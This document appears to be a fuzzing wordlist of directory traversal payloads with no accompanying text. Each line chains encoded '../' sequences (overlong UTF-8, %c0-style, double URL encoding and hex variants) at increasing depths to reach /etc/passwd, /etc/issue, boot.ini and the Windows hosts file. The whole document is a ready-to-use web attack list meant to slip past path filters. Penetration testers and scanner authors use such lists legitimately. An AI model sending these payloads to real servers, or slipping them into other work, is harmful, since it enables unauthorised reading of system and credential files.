-%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%afetc%f8%80%80%80%afissue -%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%afboot.ini -%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%afetc%f8%80%80%80%afissue -%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%afboot.ini -%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%af%2e%2e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%%c0%6e%c0%6e/etc/passwd -%%c0%6e%c0%6e/etc/issue -%%c0%6e%c0%6e/boot.ini -%%c0%6e%c0%6e/windows/system32/drivers/etc/hosts -%%c0%6e%c0%6e/%%c0%6e%c0%6e/etc/passwd -%%c0%6e%c0%6e/%%c0%6e%c0%6e/etc/issue -%%c0%6e%c0%6e/%%c0%6e%c0%6e/boot.ini -%%c0%6e%c0%6e/%%c0%6e%c0%6e/windows/system32/drivers/etc/hosts -%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/etc/passwd -%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/etc/issue -%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/boot.ini -%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/windows/system32/drivers/etc/hosts -%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/etc/passwd -%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/etc/issue -%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/boot.ini -%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/windows/system32/drivers/etc/hosts -%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/etc/passwd -%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/etc/issue -%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/boot.ini -%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/windows/system32/drivers/etc/hosts -%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/etc/passwd -%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/etc/issue -%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/boot.ini -%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/%%c0%6e%c0%6e/windows/system32/drivers/etc/hosts -%%c0%6e%c0%6e\etc\passwd -%%c0%6e%c0%6e\etc\issue -%%c0%6e%c0%6e\boot.ini -%%c0%6e%c0%6e\windows\system32\drivers\etc\hosts -%%c0%6e%c0%6e\%%c0%6e%c0%6e\etc\passwd -%%c0%6e%c0%6e\%%c0%6e%c0%6e\etc\issue -%%c0%6e%c0%6e\%%c0%6e%c0%6e\boot.ini -%%c0%6e%c0%6e\%%c0%6e%c0%6e\windows\system32\drivers\etc\hosts -%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\etc\passwd -%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\etc\issue -%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\boot.ini -%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\windows\system32\drivers\etc\hosts -%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\etc\passwd -%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\etc\issue -%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\boot.ini -%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\windows\system32\drivers\etc\hosts -%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\etc\passwd -%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\etc\issue -%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\boot.ini -%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\windows\system32\drivers\etc\hosts -%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\etc\passwd -%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\etc\issue -%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\boot.ini -%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\%%c0%6e%c0%6e\windows\system32\drivers\etc\hosts -%%c0%6e%c0%6e%2fetc%2fpasswd -%%c0%6e%c0%6e%2fetc%2fissue -%%c0%6e%c0%6e%2fboot.ini -%%c0%6e%c0%6e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2fetc%2fpasswd -%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2fetc%2fissue -%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2fboot.ini -%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2fetc%2fpasswd -%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2fetc%2fissue -%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2fboot.ini -%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2fetc%2fpasswd -%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2fetc%2fissue -%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2fboot.ini -%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2fetc%2fpasswd -%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2fetc%2fissue -%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2fboot.ini -%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2fetc%2fpasswd -%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2fetc%2fissue -%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2fboot.ini -%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2f%%c0%6e%c0%6e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%%c0%6e%c0%6e%5cetc%5cpasswd -%%c0%6e%c0%6e%5cetc%5cissue -%%c0%6e%c0%6e%5cboot.ini -%%c0%6e%c0%6e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5cetc%5cpasswd -%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5cetc%5cissue -%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5cboot.ini -%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5cetc%5cpasswd -%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5cetc%5cissue -%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5cboot.ini -%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5cetc%5cpasswd -%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5cetc%5cissue -%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5cboot.ini -%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5cetc%5cpasswd -%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5cetc%5cissue -%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5cboot.ini -%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5cetc%5cpasswd -%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5cetc%5cissue -%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5cboot.ini -%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5c%%c0%6e%c0%6e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%%c0%6e%c0%6e0x2fetc0x2fpasswd -%%c0%6e%c0%6e0x2fetc0x2fissue -%%c0%6e%c0%6e0x2fboot.ini -%%c0%6e%c0%6e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2fetc0x2fpasswd -%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2fetc0x2fissue -%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2fboot.ini -%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2fetc0x2fpasswd -%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2fetc0x2fissue -%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2fboot.ini -%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2fetc0x2fpasswd -%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2fetc0x2fissue -%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2fboot.ini -%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2fetc0x2fpasswd -%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2fetc0x2fissue -%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2fboot.ini -%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2fetc0x2fpasswd -%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2fetc0x2fissue -%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2fboot.ini -%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2f%%c0%6e%c0%6e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%%c0%6e%c0%6e0x5cetc0x5cpasswd -%%c0%6e%c0%6e0x5cetc0x5cissue -%%c0%6e%c0%6e0x5cboot.ini -%%c0%6e%c0%6e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5cetc0x5cpasswd -%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5cetc0x5cissue -%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5cboot.ini -%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5cetc0x5cpasswd -%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5cetc0x5cissue -%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5cboot.ini -%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5cetc0x5cpasswd -%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5cetc0x5cissue -%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5cboot.ini -%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5cetc0x5cpasswd -%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5cetc0x5cissue -%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5cboot.ini -%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5cetc0x5cpasswd -%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5cetc0x5cissue -%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5cboot.ini -%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5c%%c0%6e%c0%6e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%%c0%6e%c0%6e%252fetc%252fpasswd -%%c0%6e%c0%6e%252fetc%252fissue -%%c0%6e%c0%6e%252fboot.ini -%%c0%6e%c0%6e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252fetc%252fpasswd -%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252fetc%252fissue -%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252fboot.ini -%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252fetc%252fpasswd -%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252fetc%252fissue -%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252fboot.ini -%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252fetc%252fpasswd -%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252fetc%252fissue -%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252fboot.ini -%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252fetc%252fpasswd -%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252fetc%252fissue -%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252fboot.ini -%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252fetc%252fpasswd -%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252fetc%252fissue -%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252fboot.ini -%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252f%%c0%6e%c0%6e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%%c0%6e%c0%6e%255cetc%255cpasswd -%%c0%6e%c0%6e%255cetc%255cissue -%%c0%6e%c0%6e%255cboot.ini -%%c0%6e%c0%6e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255cetc%255cpasswd -%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255cetc%255cissue -%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255cboot.ini -%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255cetc%255cpasswd -%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255cetc%255cissue -%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255cboot.ini -%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255cetc%255cpasswd -%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255cetc%255cissue -%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255cboot.ini -%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255cetc%255cpasswd -%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255cetc%255cissue -%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255cboot.ini -%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255cetc%255cpasswd -%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255cetc%255cissue -%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255cboot.ini -%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255c%%c0%6e%c0%6e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%%c0%6e%c0%6e%c0%2fetc%c0%2fpasswd -%%c0%6e%c0%6e%c0%2fetc%c0%2fissue -%%c0%6e%c0%6e%c0%2fboot.ini -%%c0%6e%c0%6e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2fetc%c0%2fpasswd -%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2fetc%c0%2fissue -%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2fboot.ini -%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2fetc%c0%2fpasswd -%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2fetc%c0%2fissue -%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2fboot.ini -%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2fetc%c0%2fpasswd -%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2fetc%c0%2fissue -%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2fboot.ini -%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2f%%c0%6e%c0%6e%c0%2fetc%c0%2fpasswd 